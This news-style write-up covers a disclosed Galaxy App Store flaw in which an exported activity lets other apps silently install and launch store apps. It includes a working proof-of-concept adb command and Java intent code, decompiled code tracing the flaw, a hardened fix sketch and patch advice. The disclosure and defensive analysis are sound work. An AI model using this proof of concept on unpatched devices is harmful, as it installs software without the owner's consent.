Last December, security researchers from the NCC Group discovered two vulnerabilities in Galaxy App Store which can let an attacker install any application available on the Galaxy App Store without the user’s knowledge or direct victims to malicious websites.

On January 1, 2023, Samsung released Galaxy App Store version 4.5.49.8 and publicly disclosed the issue.

Today, the NCC Group published technical details for the two security issues, along with proof-of-concept (PoC) exploit code for each of them.

Forcing App Install

Security researchers found that the Galaxy App Store has an exported activity that does not handle incoming intents in a safe manner. This allows other applications installed on the same Samsung device to automatically install any application available on the Galaxy App Store without the user’s knowledge.

The following adb command can be used to abuse this issue to automatically install the application “Pokemon Go”:

am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity --es GUID com.nianticlabs.pokemongo.ares --ez directInstall true --ez directOpen true

Alternatively, the following Java code can be used to perform the same action:

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity"));
intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares");
intent.putExtra("directInstall", true);
intent.putExtra("directOpen", true);
startActivity(intent);

After executing the PoC, the activity com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity processes the incoming intent in its onCreate(bundle) method. As part of this function, one of two methods is executed depending on whether the incoming intent contained a data property:

public class AlleyDetailActivity {
...
public void onCreate(Bundle bundle) {
    ...
    Intent intent = getIntent();
    Uri data = intent.getData();
    ...
    if (data == null) {
        a(intent);
    } else {
        e();
    }
    ...
}

The PoC did not add a data property to the new intent, so the method a(intent) gets executed, while passing the calling intent as an argument. Within a(intent), the intent and its extras are passed to class com.sec.android.app.samsungapps.detail.alleypopup.AlleyBundleContainer method parseValues(bundle, intent):

public class AlleyDetailActivity {
...
public void a(Intent intent) {
    ...
    Bundle extras = intent.getExtras();
    AlleyBundleContainer bundleContainer = getBundleContainer();
    ...
    if (extras != null) {
        this.f = bundleContainer.parseValues(extras, intent);
    }
    ...
}

The method parseValues(bundle, intent) parses the intent extras and adds them to a Content object. Some of the important values include:

  • “GUID” = the package name of the application to be installed
  • “directInstall” = if the package should be automatically installed
  • “directOpen” = if the application should be opened right after it is installed

public class AlleyBundleContainer {
...
public ContentDetailContainer parseValues(Bundle bundle, Intent intent) {
    Content content = new Content();
    // The package to install is taken straight from the untrusted extras
    String string = bundle.getString("GUID");
    content.setGUID(string);
    ...
    // Both privileged flags are read from the caller-controlled bundle
    this.g = bundle.getBoolean("directInstall", false);
    this.h = bundle.getBoolean("directOpen", false);
    ...
    return content;
}

Later, since directInstall is set to true, the application executes the method J() within the AlleyDetailActivity class. This method in turn calls the method b(AlleyDetailActivity) within the class com.sec.android.app.samsungapps.detail.alleypopup.b:

public class AlleyDetailActivity {
...
public void J() {
    ...
    if (this.d == Constant_todo.AppType.APP_NOT_INSTALLED || this.d == Constant_todo.AppType.APP_UPDATABLE) {
        b.b(this);
    }
}

The method b(AlleyDetailActivity) then sets up a task to download and install the target application that was specified by the incoming intent. After the application is installed, since directOpen was also set to true, the Galaxy App Store opens the newly installed application.
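The root cause is that an exported activity honours the directInstall and directOpen extras from any caller. The following hardened sketch, added here as an illustration rather than Samsung's code (class, method and field names are hypothetical), shows one way such an activity could parse the same extras while refusing silent installs from untrusted callers; in practice the activity should additionally be protected by a signature-level permission or marked non-exported in the manifest.

```java
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;

// Added example, not the Galaxy App Store's own code. Names are hypothetical.
public class HardenedDetailActivity extends Activity {
    // Only the store's own package is allowed to request an automatic install.
    private static final String TRUSTED_PACKAGE = "com.sec.android.app.samsungapps";

    static final class ParsedRequest {
        final String guid;
        final boolean directInstall;
        final boolean directOpen;
        ParsedRequest(String guid, boolean directInstall, boolean directOpen) {
            this.guid = guid;
            this.directInstall = directInstall;
            this.directOpen = directOpen;
        }
    }

    // Privileged flags are only honoured when the caller is trusted; for every
    // other caller they are forced to false, so the user must confirm any install.
    static ParsedRequest parseValues(Bundle extras, boolean callerTrusted) {
        if (extras == null) {
            return new ParsedRequest(null, false, false);
        }
        String guid = extras.getString("GUID");
        boolean install = callerTrusted && extras.getBoolean("directInstall", false);
        boolean open = install && extras.getBoolean("directOpen", false);
        return new ParsedRequest(guid, install, open);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        // getCallingPackage() is verified by the system, but it is null when the
        // caller used startActivity() instead of startActivityForResult(); a null
        // caller is treated as untrusted.
        boolean trusted = TRUSTED_PACKAGE.equals(getCallingPackage());
        ParsedRequest req = parseValues(intent.getExtras(), trusted);
        if (req.directInstall) {
            // startDownloadAndInstall(req);  // hypothetical trusted-only install flow
        } else {
            // showDetailPage(req.guid);      // always requires an explicit user tap
        }
    }
}
```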


Recommendation

For Samsung devices running Android 12 or lower, Samsung has released an updated version of the Galaxy App Store (version 4.5.49.8). Users should open the Galaxy App Store on their phone, and if prompted, download and install the latest version.

This issue does not affect devices running Android 13. Users should still update their Galaxy App Store to the latest version to address other potential issues.